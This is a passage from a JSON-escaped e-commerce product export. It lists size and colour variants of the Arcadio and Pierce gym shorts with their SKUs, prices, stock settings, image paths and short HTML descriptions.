Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-36-Blue\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"967\":{\"sku\":\"MSH11-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-36-Red\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"968\":{\"sku\":\"MSH11\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer|Compression,material=Lycra&reg;|Spandex,pattern=Solid,climate=All-weather|Indoor|Hot|Spring|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH11-32-Black,size=32,color=Black|sku=MSH11-32-Blue,size=32,color=Blue|sku=MSH11-32-Red,size=32,color=Red|sku=MSH11-33-Black,size=33,color=Black|sku=MSH11-33-Blue,size=33,color=Blue|sku=MSH11-33-Red,size=33,color=Red|sku=MSH11-34-Black,size=34,color=Black|sku=MSH11-34-Blue,size=34,color=Blue|sku=MSH11-34-Red,size=34,color=Red|sku=MSH11-36-Black,size=36,color=Black|sku=MSH11-36-Blue,size=36,color=Blue|sku=MSH11-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer|Compression\",\"material\":\"Lycra&reg;|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Hot|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"969\":{\"sku\":\"MSH12-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-32-Black\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"970\":{\"sku\":\"MSH12-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-32-Gray\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"971\":{\"sku\":\"MSH12-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-32-Red\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"972\":{\"sku\":\"MSH12-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-33-Black\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"973\":{\"sku\":\"MSH12-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-33-Gray\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"974\":{\"sku\":\"MSH12-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-33-Red\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_